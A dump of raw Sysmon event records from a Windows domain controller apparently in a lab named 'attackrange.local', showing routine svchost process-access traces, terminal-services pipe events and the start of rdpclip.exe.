9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441004Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.076{42DC5269-CE98-6086-0C00-00000000BA01}8405596C:\Windows\system32\svchost.exe{42DC5269-CE99-6086-1500-00000000BA01}1200C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+163fd|c:\windows\system32\lsm.dll+23c29|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d6162|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441003Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.076{42DC5269-CE98-6086-0C00-00000000BA01}8405596C:\Windows\system32\svchost.exe{42DC5269-CE99-6086-1500-00000000BA01}1200C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+23c18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d6162|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441002Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.076{42DC5269-CE98-6086-0C00-00000000BA01}8405596C:\Windows\system32\svchost.exe{42DC5269-D4D0-6086-FD04-00000000BA01}1144C:\Windows\Explorer.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+163fd|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d6162|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 18141800x8000000000000000441001Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-ConnectPipe2021-04-27 12:24:44.075{42DC5269-CE99-6086-0E00-00000000BA01}1016\TSVCPIPE-69b67095-441f-4faa-93f1-e17fb1a8b219C:\Windows\System32\svchost.exe 10341000x8000000000000000441000Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.075{42DC5269-CE98-6086-0C00-00000000BA01}8403448C:\Windows\system32\svchost.exe{42DC5269-D4CE-6086-F004-00000000BA01}2052C:\Windows\System32\rdpclip.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440999Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.075{42DC5269-CE98-6086-0C00-00000000BA01}8403448C:\Windows\system32\svchost.exe{42DC5269-D4CE-6086-F004-00000000BA01}2052C:\Windows\System32\rdpclip.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440998Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.075{42DC5269-CE98-6086-0C00-00000000BA01}8403448C:\Windows\system32\svchost.exe{42DC5269-CE99-6086-1200-00000000BA01}480C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+6260e|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+633a8|C:\Windows\System32\combase.dll+6112d|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+7bfe9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x8000000000000000440997Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.075{42DC5269-CE98-6086-0C00-00000000BA01}8403448C:\Windows\system32\svchost.exe{42DC5269-CE99-6086-0E00-00000000BA01}1016C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+625bd|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+633a8|C:\Windows\System32\combase.dll+6112d|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+7bfe9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4 18141800x8000000000000000440996Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-ConnectPipe2021-04-27 12:24:44.075{42DC5269-CE99-6086-0E00-00000000BA01}1016\TSVCPIPE-69b67095-441f-4faa-93f1-e17fb1a8b219C:\Windows\System32\svchost.exe 17141700x8000000000000000440995Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-CreatePipe2021-04-27 12:24:44.074{42DC5269-CE99-6086-0E00-00000000BA01}1016\TSVCPIPE-69b67095-441f-4faa-93f1-e17fb1a8b219C:\Windows\System32\svchost.exe 10341000x8000000000000000440994Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.074{42DC5269-CE96-6086-0500-00000000BA01}412528C:\Windows\system32\csrss.exe{42DC5269-028C-6088-C728-00000000BA01}5892C:\Windows\System32\rdpclip.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000440993Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.073{42DC5269-CE99-6086-0E00-00000000BA01}1016632C:\Windows\System32\svchost.exe{42DC5269-028C-6088-C728-00000000BA01}5892C:\Windows\System32\rdpclip.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\termsrv.dll+47f71|c:\windows\system32\termsrv.dll+549f2|c:\windows\system32\termsrv.dll+22ee6|c:\windows\system32\termsrv.dll+22763|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+633a8|C:\Windows\System32\combase.dll+6112d|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+7bfe9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x8000000000000000440992Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.073{42DC5269-CE98-6086-0C00-00000000BA01}8403448C:\Windows\system32\svchost.exe{42DC5269-CE99-6086-1200-00000000BA01}480C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000440991Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.069{42DC5269-028C-6088-C728-00000000BA01}5892C:\Windows\System32\rdpclip.exe10.0.14393.3503 (rs1_release.200131-0410)RDP Clipboard MonitorMicrosoft® Windows® Operating SystemMicrosoft Corporationrdpclip.exerdpclipC:\Windows\system32\ATTACKRANGE\Administrator{42DC5269-D4CE-6086-10ED-2D0000000000}0x2ded102HighMD5=D887E718FB0F4C99B9F01C5BD59F8B90,SHA256=ACFA1128B4EDD953F6364FA6216337A59C0522A01349263A11259A827838A56F,IMPHASH=5A464814303942D42A66B561CF697F26{42DC5269-CE99-6086-0E00-00000000BA01}1016C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k termsvcs 10341000x8000000000000000440990Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.073{42DC5269-CE98-6086-0C00-00000000BA01}8403448C:\Windows\system32\svchost.exe{42DC5269-CE99-6086-1200-00000000BA01}480C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+773d|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440989Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.073{42DC5269-CE98-6086-0C00-00000000BA01}8405596C:\Windows\system32\svchost.exe{42DC5269-CE99-6086-1200-00000000BA01}480C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+7f5d|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440988Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.073{42DC5269-CE98-6086-0C00-00000000BA01}8403212C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2200-00000000BA01}2628C:\Windows\System32\spoolsv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+6668|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440987Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.072{42DC5269-CE98-6086-0C00-00000000BA01}8405596C:\Windows\system32\svchost.exe{42DC5269-CE99-6086-1200-00000000BA01}480C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440986Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.072{42DC5269-CE98-6086-0C00-00000000BA01}8403448C:\Windows\system32\svchost.exe{42DC5269-CE99-6086-1200-00000000BA01}480C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+163fd|c:\windows\system32\lsm.dll+23c29|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d6162|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440985Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.072{42DC5269-CE98-6086-0C00-00000000BA01}8405596C:\Windows\system32\svchost.exe{42DC5269-CE99-6086-1200-00000000BA01}480C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440984Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.072{42DC5269-CE98-6086-0C00-00000000BA01}8403448C:\Windows\system32\svchost.exe{42DC5269-CE99-6086-1200-00000000BA01}480C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+23c18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d6162|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440983Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.072{42DC5269-CE98-6086-0C00-00000000BA01}8403212C:\Windows\system32\svchost.exe{42DC5269-CE99-6086-1500-00000000BA01}1200C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+773d|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440982Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.072{42DC5269-CE98-6086-0C00-00000000BA01}8403212C:\Windows\system32\svchost.exe{42DC5269-CE99-6086-1200-00000000BA01}480C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+19ab3|c:\windows\system32\lsm.dll+1fc37|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440981Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.072{42DC5269-CE98-6086-0C00-00000000BA01}8403212C:\Windows\system32\svchost.exe{42DC5269-CE99-6086-1200-00000000BA01}480C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1fb39|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440980Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.072{42DC5269-CE98-6086-0C00-00000000BA01}8403448C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2200-00000000BA01}2628C:\Windows\System32\spoolsv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440979Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.070{42DC5269-CE98-6086-0C00-00000000BA01}8405596C:\Windows\system32\svchost.exe{42DC5269-CE99-6086-1500-00000000BA01}1200C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440978Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.070{42DC5269-CE98-6086-0C00-00000000BA01}8403448C:\Windows\system32\svchost.exe{42DC5269-CE99-6086-1500-00000000BA01}1200C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 